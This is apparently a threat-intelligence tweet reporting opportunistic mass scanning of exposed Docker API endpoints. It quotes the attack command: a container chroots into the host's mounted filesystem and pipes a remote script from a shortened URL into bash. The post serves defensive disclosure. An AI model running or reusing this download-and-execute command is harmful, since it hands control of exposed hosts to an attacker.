Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:

"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o

